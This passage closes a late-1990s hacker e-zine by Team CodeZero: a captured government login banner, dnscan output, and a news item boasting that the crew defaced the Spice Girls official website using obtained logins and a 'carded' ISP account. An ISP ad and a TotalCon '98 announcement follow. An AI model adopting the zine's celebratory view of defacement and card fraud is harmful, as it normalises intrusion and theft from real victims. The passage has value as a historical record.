  1804. *     GOVERNMENT TELECOMMUNICATIONS  SYSTEMS AND  AUTOMATED INFORMATION   *
  1805. *     SYSTEMS ARE SUBJECT TO A PERIODIC SECURITY TESTING AND MONITORING   *
  1806. *     TO ENSURE  PROPER COMMUNICATIONS  SECURITY COMSEC PROCEDURES  ARE   *
  1807. *     BEING  OBSERVED. USE  OF THESE  SYSTEMS  CONSTITUTES  CONSENT  TO   *
  1808. *     SECURITY TESTING AND COMSEC MONITORING.                             *
  1809. ***************************************************************************
  1810. *     ACCESS TO  THIS SYSTEM  WILL ONLY BE GAINED THRU  THE INFORMATION   *
  1811. *     SYSTEM SECURITY OFFICE (ISSO).  IF YOU HAVE ACCESS TO THIS SYSTEM   *
  1812. *     WITHOUT  GOING THRU  (ISSO)  --  YOU WILL BE REMOVED  --  CONTACT   *
  1813. *     YOUR ISSO IF YOU WISH TO REMAIN ON THIS SYSTEM.                     *
  1814. ***************************************************************************
  1815. *     THE INFORMIX & OSC PASSWORDS HAVE BEEN CHANGED. CONTACT THE OSC     *
  1816. *     WORK GROUP AT DSN 693-2940/2943 IF YOU EXPERIENCE PROBLEMS.         *
  1817. ***************************************************************************
  1818.  
  1819. ───────────────────────────────────────────────────────────────────────────────
  1820.   5. dnscan : sw1tch
  1821. ───────────────────────────────────────────────────────────────────────────────
  1822.  
  1823. % dnscan -domain dj
  1824. dj    intnet                          bow.rain.fr                   
  1825. dj    pnud                            bow.intnet.dj                 
  1826. %
  1827.  
  1828. that country r0x.
  1829.  
  1830. ───────────────────────────────────────────────────────────────────────────────
  1831.   6. The issues list for 1998 : so1o
  1832. ───────────────────────────────────────────────────────────────────────────────
  1833.  
  1834.   Issue 8 : Sun 22nd March
  1835.   Issue 9 : Mon 11th May
  1836.   Issue 10: Tue 30th June
  1837.   Issue 11: Wed 19th August
  1838.   Issue 12: Thu 8th October
  1839.   Issue 13: Fri 27th November
  1840.  
  1841. ───────────────────────────────────────────────────────────────────────────────
  1842. ===============================================================================
  1843. ==[ NEWS ]=====================[ .SECTION E. ]=======================[ NEWS ]==
  1844. ===============================================================================
  1845. ───────────────────────────────────────────────────────────────────────────────
  1846.   1. SpiceWorld 0wned : sw1tch
  1847. ───────────────────────────────────────────────────────────────────────────────
  1848.  
  1849. Scenario, so1o's just gotten out of policy custody after questioning, I'm
  1850. in Bristol, it's a Friday night, we have 2 laptops, 2 modems, and a set of
  1851. logins and passes for the SpiceGirls official website
  1852. (http://c3.vmg.co.uk/spicegirls), hooked our equipment up using mad tekneeqz,
  1853. and changed their elite site from a carded i$p account. The crew that were
  1854. around at the time were...
  1855.  
  1856.   so1o, NightRage, myself, BoMbJAcK, ev0, Mulder
  1857.  
  1858. It was a quick and easy job, we were soon phoning the papers etc. In the end
  1859. the page itself was up from midnight on friday to 10am on monday, thats 58
  1860. hours. The page itself is mirrored at www.hacked.net under the November
  1861. section.
  1862.  
  1863. ───────────────────────────────────────────────────────────────────────────────
  1864.   2. zeon.net : ch-e-ztic
  1865. ───────────────────────────────────────────────────────────────────────────────
  1866.  
  1867. zeon.net is an internet services provider now, we just got a t1 installed, and
  1868. we're running our shells from freeBSD, it's all good, fucking good prices too,
  1869. check out www.zeon.net, or mail sales@zeon.net for more info!
  1870.  
  1871. cheers,
  1872.  
  1873. chez.
  1874.  
  1875. ───────────────────────────────────────────────────────────────────────────────
  1876. ===============================================================================
  1877. ==[ PROJECTS ]=================[ .SECTION F. ]===================[ PROJECTS ]==
  1878. ===============================================================================
  1879. ───────────────────────────────────────────────────────────────────────────────
  1880.   1. TOTALCON '98 : so1o
  1881. ───────────────────────────────────────────────────────────────────────────────
  1882.  
  1883. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
  1884.                          http://www.aom.co.uk/total/
  1885. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
  1886.   +------------------------------------+------------------------------------+
  1887.   ▌  An Official TotalCon Announcement ▌ An Official TotalCon Announcement  ▌
  1888.   ▌  An Official TotalCon Announcement ▌ An Official TotalCon Announcement  ▌
  1889.   +------------------------------------+------------------------------------+
  1890. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
  1891.                          http://www.aom.co.uk/total/
  1892. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
  1893.  
  1894.  
  1895.  TotalCon '98 is now a reality, here are preliminary details...
  1896.  ==============================================================
  1897.  
  1898.  Venue        :  The Old Firestation, Silver Street, Bristol, ENGLAND
  1899.  Date         :  Late March 1998      27th March *OR* 4th April, TBA
  1900.  Duration     :  36 hours non-stop    (midday -> 10:00pm next day)
  1901.  
  1902.  Cost         :  £15 (15 UKP) ON THE DOOR, this will go back into
  1903.                                            the event (beer etc.)
  1904.  
  1905.  What         :  12 system network (with additional terminals) along
  1906.                  with full internet access, bring your laptops!
  1907.  
  1908.                  Loud music, live DJ's
  1909.                  Fully licensed bar downstairs / next door
  1910.                  Elite UV and spotlighting
  1911.  
  1912.                  ALOT of cool people
  1913.                  ^^^^^^^^^^^^^^^^^^^
  1914.  
  1915.       *** NO SPEAKERS WHATSOEVER *** *** NO SPEAKERS WHATSOEVER ***
  1916.  
  1917.  
  1918.  Travel        : Easily accessible by car, train, bus, plane or boat.
  1919.  
  1920.  Accomodation  : You can hang around the Firestation or book one of
  1921.                  many good hotels in the immediate area.
  1922.  
  1923.  
  1924.  Notes         : ALL CA$H RAISED AT THE DOOR FROM ENTRANCE FEES WILL
  1925.                  GO BACK INTO THE EVENT! WE WILL PURCHASE GREAT AMOUNTS
  1926.                  OF BEER AND FOOD, PROBABLY EVEN A LAPTOP AS A PRIZE!!
  1927.  
  1928.  
  1929. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
  1930.                          http://www.aom.co.uk/total/
  1931. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
  1932.   +------------------------------------+------------------------------------+
  1933.   ▌  An Official TotalCon Announcement ▌ An Official TotalCon Announcement  ▌
  1934.   ▌  An Official TotalCon Announcement ▌ An Official TotalCon Announcement  ▌
  1935.   +------------------------------------+------------------------------------+
  1936. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
  1937.                          http://www.aom.co.uk/total/
  1938. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
  1939.  
  1940. ───────────────────────────────────────────────────────────────────────────────
  1941. ===============================================================================
  1942. ==[ FIN ]======================[ .SECTION G. ]========================[ FIN ]==
  1943. ===============================================================================
  1944. ───────────────────────────────────────────────────────────────────────────────
  1945.  
  1946.                                 .-----------.                    
  1947.                                 :           :                      
  1948.                         .-----. `-----.     ; .-----.                
  1949.                 :.      :  .--'      .'    .' :     :      .:            
  1950.         .-------:::.    :  :       .'    .'   :  .  :    .:::-------.    
  1951.         `-------:::'    :: :     .'    .'     :: :  :    `:::-------'    
  1952.                 :'      ::.`--. ::::  `-----. ::.   :      `:          
  1953.                         `-----' ::::.       : `-----'                
  1954.                                 `-----------'                      
  1955.                                                                  
  1956.                               [ Team CodeZero ]                
  1957.                                                              
  1958.                          w3 r00l, ph34r 0ur tekn33qz       
  1959.                                                                                
  1960. ───────────────────────────────────────────────────────────────────────────────
  1961.